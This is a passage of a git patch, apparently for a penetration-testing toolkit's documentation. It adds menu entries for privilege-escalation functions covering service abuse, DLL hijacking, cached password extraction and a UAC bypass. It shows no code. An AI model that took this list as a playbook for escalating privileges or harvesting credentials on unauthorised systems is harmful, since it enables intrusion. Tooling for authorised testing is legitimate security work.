house of common privilege escalation checks, along with some weaponization vectors. + Get-System - GetSystem functionality inspired by Meterpreter's getsystem ### Recon Tools to aid in the reconnaissance phase of a penetration test, including PowerView. diff --git a/mkdocs.yml b/mkdocs.yml index accd72b..8b78d98 100644 --- a/mkdocs.yml +++ b/mkdocs.yml @@ -85,3 +85,37 @@ pages: - Get-HttpStatus: 'Recon/Get-HttpStatus.md' - Invoke-Portscan: 'Recon/Invoke-Portscan.md' - Invoke-ReverseDnsLookup: 'Recon/Invoke-ReverseDnsLookup.md' +- Privesc: + - About: 'Privesc/index.md' + - Functions: + - Get-ModifiablePath: 'Privesc/Get-ModifiablePath.md' + - Get-ProcessTokenGroup: 'Privesc/Get-ProcessTokenGroup.md' + - Get-ProcessTokenPrivilege: 'Privesc/Get-ProcessTokenPrivilege.md' + - Enable-Privilege: 'Privesc/Enable-Privilege.md' + - Add-ServiceDacl: 'Privesc/Add-ServiceDacl.md' + - Set-ServiceBinaryPath: 'Privesc/Set-ServiceBinaryPath.md' + - Test-ServiceDaclPermission: 'Privesc/Test-ServiceDaclPermission.md' + - Get-UnquotedService: 'Privesc/Get-UnquotedService.md' + - Get-ModifiableServiceFile: 'Privesc/Get-ModifiableServiceFile.md' + - Get-ModifiableService: 'Privesc/Get-ModifiableService.md' + - Get-ServiceDetail: 'Privesc/Get-ServiceDetail.md' + - Invoke-ServiceAbuse: 'Privesc/Invoke-ServiceAbuse.md' + - Write-ServiceBinary: 'Privesc/Write-ServiceBinary.md' + - Install-ServiceBinary: 'Privesc/Install-ServiceBinary.md' + - Restore-ServiceBinary: 'Privesc/Restore-ServiceBinary.md' + - Find-ProcessDLLHijack: 'Privesc/Find-ProcessDLLHijack.md' + - Find-PathDLLHijack: 'Privesc/Find-PathDLLHijack.md' + - Write-HijackDll: 'Privesc/Write-HijackDll.md' + - Get-RegistryAlwaysInstallElevated: 'Privesc/Get-RegistryAlwaysInstallElevated.md' + - Get-RegistryAutoLogon: 'Privesc/Get-RegistryAutoLogon.md' + - Get-ModifiableRegistryAutoRun: 'Privesc/Get-ModifiableRegistryAutoRun.md' + - Get-ModifiableScheduledTaskFile: 'Privesc/Get-ModifiableScheduledTaskFile.md' + - Get-UnattendedInstallFile: 'Privesc/Get-UnattendedInstallFile.md' + - Get-WebConfig: 'Privesc/Get-WebConfig.md' + - Get-ApplicationHost: 'Privesc/Get-ApplicationHost.md' + - Get-SiteListPassword: 'Privesc/Get-SiteListPassword.md' + - Get-CachedGPPPassword: 'Privesc/Get-CachedGPPPassword.md' + - Write-UserAddMSI: 'Privesc/Write-UserAddMSI.md' + - Invoke-WScriptUACBypass: 'Privesc/Invoke-WScriptUACBypass.md' + - Invoke-PrivescAudit: 'Privesc/Invoke-PrivescAudit.md' + - Get-System: 'Privesc/Get-System.md' -- cgit v1.2.3